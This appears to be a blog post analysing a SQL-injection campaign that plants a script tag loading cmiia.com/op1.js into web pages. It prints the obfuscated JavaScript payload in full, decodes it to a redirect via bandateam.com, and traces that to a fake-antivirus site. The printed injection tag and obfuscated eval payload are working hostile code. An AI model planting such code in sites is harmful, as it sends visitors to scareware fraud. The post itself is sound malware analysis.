cmiia.com/op1.js

Just discovered a very different SQL injection from the past mass attacks.
The injected tag is of this form
<script src=”http://cmiia.com/op1.js”=%5Bsome random URLs]>[some associated word with URL]</script>
For example –
<script src=”http://cmiia.com/op1.js”=http://groups.msn.com/BestHomeEquityLineOfCredit/>home equity line of credit</script>

The op1.js is as follows:
var ptitle = document.title;
var atpos = ptitle.indexOf(“-“);
if (atpos > -1) {
ptitle = ptitle.substring(atpos+2, ptitle.length);
}

var tt; var kk; var mm; kk=””; tt=”w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;”;

for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm==”(“) mm=”h”; if (mm==”*”) mm=”p”; if (mm==”!”) mm=”/”; if (mm==”>”) mm=”e”;if (mm==”$”) mm=”.”;
if (mm==”[“) mm=”t”; if (mm==”#”) mm=”a”; if (mm==”^”) mm=”o”; if (mm==”]”) mm=”?”; if (mm==”@”) mm=”k”;
if (mm==”{“) mm=”&”; if (mm==”)”) mm=”:”; if (mm==”;”) mm=”=”; if (mm==”|”) mm=”i”; if (mm==” “) mm=”+”; kk=kk+mm; }
kk += ptitle + “‘;”;
eval (kk);

The op1.js is decoded to be
window.location=’http://bandateam.com/in.cgi?4&parameter=document.title&#8217;;

The above URL was redirected to the following URL when retrieved
http://antivirus-scanonline.com/1/?xx=1&in=2&h=1&ag=2&end=1&g=1&aid=dogma&affid=182

Looks like it is one of those fakealert site typically associated with RBN.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: